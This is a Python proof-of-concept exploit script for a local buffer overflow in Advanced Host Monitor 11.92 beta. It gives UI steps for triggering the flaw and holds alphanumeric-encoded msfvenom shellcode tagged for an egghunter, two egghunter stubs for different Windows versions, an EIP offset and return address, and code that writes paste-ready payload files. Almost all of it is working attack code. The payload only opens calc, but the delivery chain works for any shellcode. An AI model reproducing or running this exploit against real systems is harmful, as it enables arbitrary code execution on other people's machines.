#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-18 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe #
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe #
# Version: 11.92 beta #
# The program also has an SEH overflow, which can be exploited in a similar way #
# Special Thanks to my wife #
# Steps : Open the APP --> Tools --> Trace (or Telnet) --> paste in contents from the egg.txt into "Host" --> Start --> Close #
# Advanced Host Monitor --> Options --> Startup --> paste in contents from the egghunter-winxp-win7.txt or #
# egghunter-win10.txt (depending on your Windows version) into "load specific HTML file" --> Save --> Wait a little --> #
# Shellcode (Calc) open #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#------------------------------------------------------------------------------------------------------------------------------------#

#--------------------------------------------------- EGG Shellcode Generation ---------------------------------------------------

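# msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#
# The payload is prefixed with the "w00tw00t" tag the egghunter scans memory for;
# the encoded body behind it is pure alphanumeric ASCII (alpha_mixed), which is
# what lets it survive being pasted into a text field.
#
# NOTE(review): every byte MUST be written as a "\xNN" escape. Written as bare
# "x57x59..." text the string is three printable characters per intended byte,
# the payload is not the shellcode at all, and it is three times too long.
EGG_TAG = "w00tw00t"

egg = EGG_TAG
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

# Sanity check before writing: the tag must lead and every byte must be
# alphanumeric, otherwise the text field and the alpha decoder will mangle it.
if not egg.startswith(EGG_TAG) or not egg.isalnum():
    raise ValueError("egg payload is not pure alphanumeric - check the \\x escapes")

# Pure printable ASCII with no line breaks, so text mode is safe on every platform.
with open("egg.txt", "w") as f:
    f.write(egg)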

#----------------------------------------------- EGG Hunter Shellcode Generation ----------------------------------------------

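# Encode the egghunter produced by mona (looking for "w00tw00t") into only alpha characters.
#
# Both hunters open with "\x4c\x4c\x4c\x4c\x5f" (dec esp x4 ; pop edi): the
# alpha_mixed decoder was generated with BufferRegister=EDI, so EDI has to
# point at the decoder itself when it starts executing.
#
# NOTE(review): as with the egg, every byte MUST be a "\xNN" escape. Bare
# "x4c..." text is three characters per byte; the hunter would then exceed the
# EIP offset and the padding arithmetic would silently produce an empty pad.

# Distance in bytes from the start of the "load specific HTML file" value to
# the saved return address, per the original write-up.
EIP_OFFSET = 268

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

# Only three bytes are supplied; presumably the string terminator the target
# appends provides the fourth (0x00) byte, making the overwritten return address
# 0x0041374d, i.e. inside the main image - TODO confirm against the binary.
eip = "\x4d\x37\x41"


def build_buffer(hunter, offset=EIP_OFFSET, ret=eip):
    """Return hunter + "A" padding up to offset + ret, ready to paste.

    Args:
        hunter: egghunter stub that must execute at the start of the field.
        offset: byte distance from the start of the field to saved EIP.
        ret: bytes placed over saved EIP.

    Raises:
        ValueError: if hunter does not fit in front of the return address, or
            contains NUL/CR/LF bytes that a text field would truncate or alter.
            The original unchecked arithmetic yields an empty pad (negative
            repeat count) instead of failing when the hunter is too long.
    """
    if len(hunter) > offset:
        raise ValueError("egghunter is %d bytes, exceeds the %d-byte EIP offset"
                         % (len(hunter), offset))
    if any(c in "\x00\r\n" for c in hunter):
        raise ValueError("egghunter contains NUL/CR/LF bytes")
    return hunter + "\x41" * (offset - len(hunter)) + ret


def write_payload(path, data):
    """Write data to path; text mode is safe because every byte is printable ASCII."""
    with open(path, "w") as f:
        f.write(data)


# `buffer` is kept as the module-level name the original script exposed.
buffer = build_buffer(egghunter)
write_payload("egghunter-winxp-win7.txt", buffer)

buffer = build_buffer(egghunter10)
write_payload("egghunter-win10.txt", buffer)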